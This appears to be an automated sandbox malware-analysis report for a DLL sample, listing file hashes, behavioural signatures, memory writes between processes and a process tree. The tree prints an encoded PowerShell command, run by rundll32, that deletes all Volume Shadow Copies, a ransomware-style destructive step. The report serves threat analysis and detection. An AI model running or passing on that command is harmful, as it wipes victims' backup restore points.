Analysis
-
max time kernel
119s -
max time network
136s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
24-01-2022 00:44
Static task
static1
Behavioral task
behavioral1
Sample
f060508128cec81900681d00dcb87346d3f30c883b7a1cd657b93564963462ff.dll
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
f060508128cec81900681d00dcb87346d3f30c883b7a1cd657b93564963462ff.dll
Resource
win10-en-20211208
General
-
Target
f060508128cec81900681d00dcb87346d3f30c883b7a1cd657b93564963462ff.dll
-
Size
116KB
-
MD5
fa5a352ea598827d7249f6929bad286c
-
SHA1
cf9bbb956577e5fc2e48d5ec29771741c73888cb
-
SHA256
f060508128cec81900681d00dcb87346d3f30c883b7a1cd657b93564963462ff
-
SHA512
9915d5196c8a6931b9fd22aae96f8aa76c46492c0e81b15836afefef74e54760d952619f5629116ef3da599b4355885be5a77fc81bd8065d688292f239a01c69
Malware Config
Signatures
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
rundll32.exedescription ioc process File opened (read-only) \??\A: rundll32.exe File opened (read-only) \??\B: rundll32.exe File opened (read-only) \??\E: rundll32.exe File opened (read-only) \??\G: rundll32.exe File opened (read-only) \??\O: rundll32.exe File opened (read-only) \??\T: rundll32.exe File opened (read-only) \??\V: rundll32.exe File opened (read-only) \??\W: rundll32.exe File opened (read-only) \??\L: rundll32.exe File opened (read-only) \??\U: rundll32.exe File opened (read-only) \??\H: rundll32.exe File opened (read-only) \??\N: rundll32.exe File opened (read-only) \??\Q: rundll32.exe File opened (read-only) \??\R: rundll32.exe File opened (read-only) \??\X: rundll32.exe File opened (read-only) \??\F: rundll32.exe File opened (read-only) \??\I: rundll32.exe File opened (read-only) \??\J: rundll32.exe File opened (read-only) \??\K: rundll32.exe File opened (read-only) \??\M: rundll32.exe File opened (read-only) \??\P: rundll32.exe File opened (read-only) \??\S: rundll32.exe File opened (read-only) \??\Y: rundll32.exe File opened (read-only) \??\Z: rundll32.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
rundll32.exepowershell.exepid process 316 rundll32.exe 268 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
rundll32.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 316 rundll32.exe Token: SeDebugPrivilege 268 powershell.exe Token: SeBackupPrivilege 1824 vssvc.exe Token: SeRestorePrivilege 1824 vssvc.exe Token: SeAuditPrivilege 1824 vssvc.exe -
Suspicious use of WriteProcessMemory 11 IoCs
Processes:
rundll32.exerundll32.exedescription pid process target process PID 1648 wrote to memory of 316 1648 rundll32.exe rundll32.exe PID 1648 wrote to memory of 316 1648 rundll32.exe rundll32.exe PID 1648 wrote to memory of 316 1648 rundll32.exe rundll32.exe PID 1648 wrote to memory of 316 1648 rundll32.exe rundll32.exe PID 1648 wrote to memory of 316 1648 rundll32.exe rundll32.exe PID 1648 wrote to memory of 316 1648 rundll32.exe rundll32.exe PID 1648 wrote to memory of 316 1648 rundll32.exe rundll32.exe PID 316 wrote to memory of 268 316 rundll32.exe powershell.exe PID 316 wrote to memory of 268 316 rundll32.exe powershell.exe PID 316 wrote to memory of 268 316 rundll32.exe powershell.exe PID 316 wrote to memory of 268 316 rundll32.exe powershell.exe
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\f060508128cec81900681d00dcb87346d3f30c883b7a1cd657b93564963462ff.dll,#11⤵
- Suspicious use of WriteProcessMemory
PID:1648 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\f060508128cec81900681d00dcb87346d3f30c883b7a1cd657b93564963462ff.dll,#12⤵
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:316 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:268
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:804
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1824
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/268-55-0x000007FEFC441000-0x000007FEFC443000-memory.dmpFilesize
8KB
-
memory/268-57-0x0000000002870000-0x0000000002872000-memory.dmpFilesize
8KB
-
memory/268-58-0x0000000002872000-0x0000000002874000-memory.dmpFilesize
8KB
-
memory/268-59-0x0000000002874000-0x0000000002877000-memory.dmpFilesize
12KB
-
memory/268-56-0x000007FEF3630000-0x000007FEF418D000-memory.dmpFilesize
11.4MB
-
memory/268-60-0x000000000287B000-0x000000000289A000-memory.dmpFilesize
124KB
-
memory/316-54-0x0000000076001000-0x0000000076003000-memory.dmpFilesize
8KB